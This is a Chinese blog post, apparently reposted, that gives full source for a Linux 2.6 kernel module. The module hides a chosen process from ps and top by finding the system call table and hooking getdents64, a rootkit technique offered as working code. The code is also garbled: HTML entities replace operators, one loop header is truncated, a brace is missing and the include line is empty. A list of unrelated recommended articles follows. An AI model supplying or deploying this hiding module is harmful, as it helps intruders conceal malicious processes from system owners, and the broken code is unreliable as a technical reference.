在Linux2.6内核中实现隐藏进程的技术方法与实践

作者：蓝色流星魂 | 来源：互联网 | 2024-10-30 12:57

本文探讨了在Linux2.6内核中实现进程隐藏的技术方法与实践。通过分析系统调用`sys_getdents`的工作原理，提出了一种有效的方法来隐藏指定的进程。该方法通过对内核模块进行修改，拦截并过滤掉目标进程的相关信息，从而在常用的进程查看命令（如`ps`和`top`）中无法显示这些隐藏的进程。实验结果表明，该方法在实际应用中具有较高的隐蔽性和稳定性。

很早以前的小程序&＃xff0c;比较简单但是觉得有趣

原理很简单&＃xff0c;Linux查看进程的命令ps是通过系统调用sys_getdents实现&＃xff0c;sys_getdents用户获取一个指定路径下的目录条目&＃xff0c;实际上就是枚举

/proc/　下的pid&＃xff0c;这样我们只需要hook一下sys_getdents&＃xff0c;把相应的要隐藏的pid信息去掉即可。

以下是LKM代码&＃xff0c;在Linux-2.6.14并运行成功

#include

#define CALLOFF 100

//使用模块参数来定义需要隐藏的进程名

char *processname;

module_param(processname, charp, 0);

struct {

unsigned short limit;

unsigned int base;

} __attribute__ ((packed)) idtr;

struct {

unsigned short off1;

unsigned short sel;

unsigned char none,

flags;

unsigned short off2;

} __attribute__ ((packed)) * idt;

void** sys_call_table;

asmlinkage long (*orig_getdents)(unsigned int fd, struct linux_dirent64 __user *dirp, unsigned int count);

char * findoffset(char *start)

{

char *p;

for (p &＃61; start; p

if (*(p &＃43; 0) &＃61;&＃61; &＃39;\xff&＃39; && *(p &＃43; 1) &＃61;&＃61; &＃39;\x14&＃39; && *(p &＃43; 2) &＃61;&＃61; &＃39;\x85&＃39;)

return p;

return NULL;

}

int myatoi(char *str)

{

int res &＃61; 0;

int mul &＃61; 1;

char *ptr;

for (ptr &＃61; str &＃43; strlen(str) - 1; ptr >&＃61; str; ptr--) {

if (*ptr <&＃39;0&＃39; || *ptr > &＃39;9&＃39;)

return (-1);

res &＃43;&＃61; (*ptr - &＃39;0&＃39;) * mul;

mul *&＃61; 10;

}

return (res);

}

struct task_struct *get_task(pid_t pid)

{

struct task_struct *p &＃61; get_current(),*entry&＃61;NULL;

list_for_each_entry(entry,&(p->tasks),tasks)

{

if(entry->pid &＃61;&＃61; pid)

{

printk("pid found\n");

return entry;

}

return NULL;

}

static inline char *get_name(struct task_struct *p, char *buf)

{

int i;

char *name;

name &＃61; p->comm;

i &＃61; sizeof(p->comm);

do {

unsigned char c &＃61; *name;

name&＃43;&＃43;;

i--;

*buf &＃61; c;

if (!c)

break;

if (c &＃61;&＃61; &＃39;\\&＃39;) {

buf[1] &＃61; c;

buf &＃43;&＃61; 2;

continue;

}

if (c &＃61;&＃61; &＃39;\n&＃39;) {

buf[0] &＃61; &＃39;\\&＃39;;

buf[1] &＃61; &＃39;n&＃39;;

buf &＃43;&＃61; 2;

continue;

}

buf&＃43;&＃43;;

}

while (i);

*buf &＃61; &＃39;\n&＃39;;

return buf &＃43; 1;

}　int get_process(pid_t pid)

{

struct task_struct *task &＃61; get_task(pid);

char *buffer[64] &＃61; {0};

if (task)

{

get_name(task, buffer);

if(strstr(buffer,processname))

return 1;

else

return 0;

}

else

return 0;

}

asmlinkage long hacked_getdents(unsigned int fd, struct linux_dirent64 __user *dirp, unsigned int count)

{

//added by lsc for process

long value;

struct inode *dinode;

int len &＃61; 0;

int tlen &＃61; 0;

struct linux_dirent64 *mydir &＃61; NULL;

//end

//在这里调用一下sys_getdents,得到返回的结果

value &＃61; (*orig_getdents) (fd, dirp, count);

tlen &＃61; value;

//遍历得到的目录列表

while(tlen > 0)

{

len &＃61; dirp->d_reclen;

tlen &＃61; tlen - len;

printk("%s\n",dirp->d_name);

//在proc文件系统中&＃xff0c;目录名就是pid,我们再根据pid找到进程名

if(get_process(myatoi(dirp->d_name)) )

{

printk("find process\n");

//发现匹配的进程&＃xff0c;调用memmove将这条进程覆盖掉

memmove(dirp, (char *) dirp &＃43; dirp->d_reclen, tlen);

value &＃61; value - len;

}

if(tlen)

dirp &＃61; (struct linux_dirent64 *) ((char *)dirp &＃43; dirp->d_reclen);

}

return value;

}

void **get_sct_addr(void)

{

unsigned sys_call_off;

unsigned sct &＃61; 0;

char *p;

asm("sidt %0":"&＃61;m"(idtr));

idt &＃61; (void *) (idtr.base &＃43; 8 * 0x80);

sys_call_off &＃61; (idt->off2 <<16) | idt->off1;

if ((p &＃61; findoffset((char *) sys_call_off)))

sct &＃61; *(unsigned *) (p &＃43; 3);

return ((void **)sct);

}

static void filter_exit(void)

{

if (sys_call_table)

sys_call_table[__NR_getdents64] &＃61; orig_getdents;

}

static int filter_init(void)

{

//得到sys_call_table的偏移地址

sys_call_table &＃61; get_sct_addr();

if (!sys_call_table) {

printk("get_act_addr(): NULL...\n");

return 0;

} else

printk("sct: 0x%x\n", (unsigned int)sys_call_table);

//将sys_call_table中注册的系统调用sys_getdents替换成我们自己的函数hack_getdents

orig_getdents &＃61; sys_call_table[__NR_getdents64];

sys_call_table[__NR_getdents64] &＃61; hacked_getdents;

return 0;

}

module_init(filter_init);

module_exit(filter_exit);

MODULE_LICENSE("GPL");

推荐阅读

function
使用Objective-C和dispatch库实现并发素数计算

本文介绍如何使用Objective-C结合dispatch库进行并发编程，以提高素数计数任务的效率。通过对比纯C代码与引入并发机制后的代码，展示dispatch库的强大功能。 ... [详细]

蜡笔小新 2024-12-28 08:44:35
format
UNP 第9章：主机名与地址转换

本章探讨了用于在主机名和数值地址之间进行转换的函数，如gethostbyname和gethostbyaddr。此外，还介绍了getservbyname和getservbyport函数，用于在服务器名和端口号之间进行转换。 ... [详细]

蜡笔小新 2024-12-27 11:26:39
java
Java并发编程：LinkedBlockingQueue的实际应用

本文介绍了Java并发库中的阻塞队列（BlockingQueue）及其典型应用场景。通过具体实例，展示了如何利用LinkedBlockingQueue实现线程间高效、安全的数据传递，并结合线程池和原子类优化性能。 ... [详细]

蜡笔小新 2024-12-27 18:51:49
go
USACO 2014 Jan - Moolympics区间记录优化算法

题目描述：给定n个半开区间[a, b)，要求使用两个互不重叠的记录器，求最多可以记录多少个区间。解决方案采用贪心算法，通过排序和遍历实现最优解。 ... [详细]

蜡笔小新 2024-12-27 18:14:31
runtime
从 .NET 转 Java 的自学之路：IO 流基础篇

本文详细介绍了 Java 中的 IO 流，包括字节流和字符流的基本概念及其操作方式。探讨了如何处理不同类型的文件数据，并结合编码机制确保字符数据的正确读写。同时，文中还涵盖了装饰设计模式的应用，以及多种常见的 IO 操作实例。 ... [详细]

蜡笔小新 2024-12-26 17:37:25
go
Weight the Tree（树形dp）

题目Link题目学习link1题目学习link2题目学习link3%%%受益匪浅！－－－－－&# ... [详细]

蜡笔小新 2024-12-26 15:55:56
go
VxWorks中的双向链表与环形缓冲应用

本文详细探讨了VxWorks操作系统中双向链表和环形缓冲区的实现原理及使用方法，通过具体示例代码加深理解。 ... [详细]

蜡笔小新 2024-12-26 13:26:16
merge
计算机图形学实训：OpenGL入门与直线光栅化算法

本教程涵盖OpenGL基础操作及直线光栅化技术，包括点的绘制、简单图形绘制、直线绘制以及DDA和中点画线算法。通过逐步实践，帮助读者掌握OpenGL的基本使用方法。 ... [详细]

蜡笔小新 2024-12-26 12:24:25
email
MyBatis 动态 SQL 详解与应用

本文深入探讨 MyBatis 中动态 SQL 的使用方法，包括 if/where、trim 自定义字符串截取规则、choose 分支选择、封装查询和修改条件的 where/set 标签、批量处理的 foreach 标签以及内置参数和 bind 的用法。 ... [详细]

蜡笔小新 2024-12-27 16:20:10
merge
Java面试题解析

本文详细介绍了Java编程语言中的核心概念和常见面试问题，包括集合类、数据结构、线程处理、Java虚拟机（JVM）、HTTP协议以及Git操作等方面的内容。通过深入分析每个主题，帮助读者更好地理解Java的关键特性和最佳实践。 ... [详细]

蜡笔小新 2024-12-27 13:55:14
java
寻找满足特定条件的整数N的最大和(a+b)

本文探讨了如何在给定整数N的情况下，找到两个不同的整数a和b，使得它们的和最大，并且满足特定的数学条件。 ... [详细]

蜡笔小新 2024-12-26 19:26:18
java
Splay Tree 区间操作优化

本文详细介绍了使用Splay Tree进行区间操作的实现方法，包括插入、删除、修改、翻转和求和等操作。通过这些操作，可以高效地处理动态序列问题，并且代码实现具有一定的挑战性，有助于编程能力的提升。 ... [详细]

蜡笔小新 2024-12-26 18:47:12
java
文件描述符、文件句柄与打开文件之间的关联解析

本文详细探讨了文件描述符、文件句柄和打开文件之间的关系，通过具体示例解释了它们在操作系统中的作用及其相互影响。 ... [详细]

蜡笔小新 2024-12-26 14:00:46
java
C语言链表动态创建：头插法与尾插法详解

本文详细介绍了C语言中链表的两种动态创建方法——头插法和尾插法，包括具体的实现代码和运行示例。通过这些内容，读者可以更好地理解和掌握链表的基本操作。 ... [详细]

蜡笔小新 2024-12-26 13:59:07
function
Linux设备驱动程序：异步时间操作与调度机制

本文介绍了Linux内核中的几种异步延迟操作方法，包括内核定时器、tasklet机制和工作队列。这些机制允许在未来的某个时间点执行任务，而无需阻塞当前线程，从而提高系统的响应性和效率。 ... [详细]

蜡笔小新 2024-12-26 08:55:03

蓝色流星魂

这个家伙很懒，什么也没留下！

Tags | 热门标签

RankList | 热门文章